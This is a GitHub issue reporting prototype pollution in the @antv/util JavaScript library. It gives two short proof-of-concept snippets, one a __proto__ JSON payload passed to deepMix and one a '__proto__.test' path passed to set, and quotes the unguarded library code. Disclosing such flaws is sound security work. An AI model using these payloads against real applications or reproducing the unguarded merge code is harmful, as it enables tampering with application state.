Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

潜在的原型链污染漏洞 #114

Open
yllhwa opened this issue May 22, 2024 · 1 comment
Open

潜在的原型链污染漏洞 #114

yllhwa opened this issue May 22, 2024 · 1 comment

Comments

@yllhwa
Copy link

yllhwa commented May 22, 2024

复现代码1:

let deepMix = require("@antv/util").deepMix;

let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');

let obj = {};
deepMix(obj, BAD_JSON);

console.log({}.test); // 123

问题代码:

const deepMix = function (rst: any, ...args: any[]) {
for (let i = 0; i < args.length; i += 1) {
_deepMix(rst, args[i]);
}
return rst;
};

复现代码2:

let set = require("@antv/util").set;

let obj = {};
set(obj, "__proto__.test", 123);

console.log({}.test); // 123

问题代码:

util/src/lodash/set.ts

Lines 5 to 29 in c499a30

/**
* https://github.com/developit/dlv/blob/master/index.js
* @param obj
* @param path
* @param value
*/
export default (obj: any, path: string | any[], value: any): any => {
let o = obj;
const keyArr = isString(path) ? path.split('.') : path;
keyArr.forEach((key: string | number, idx: number) => {
// 不是最后一个
if (idx < keyArr.length - 1) {
if (!isObject(o[key])) {
o[key] = isNumber(keyArr[idx + 1]) ? [] : {};
}
o = o[key];
} else {
o[key] = value;
}
});
return obj;
};

@hustcc
Copy link
Member

hustcc commented May 22, 2024

有改进方式吗?直接来个 PR 吧~

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants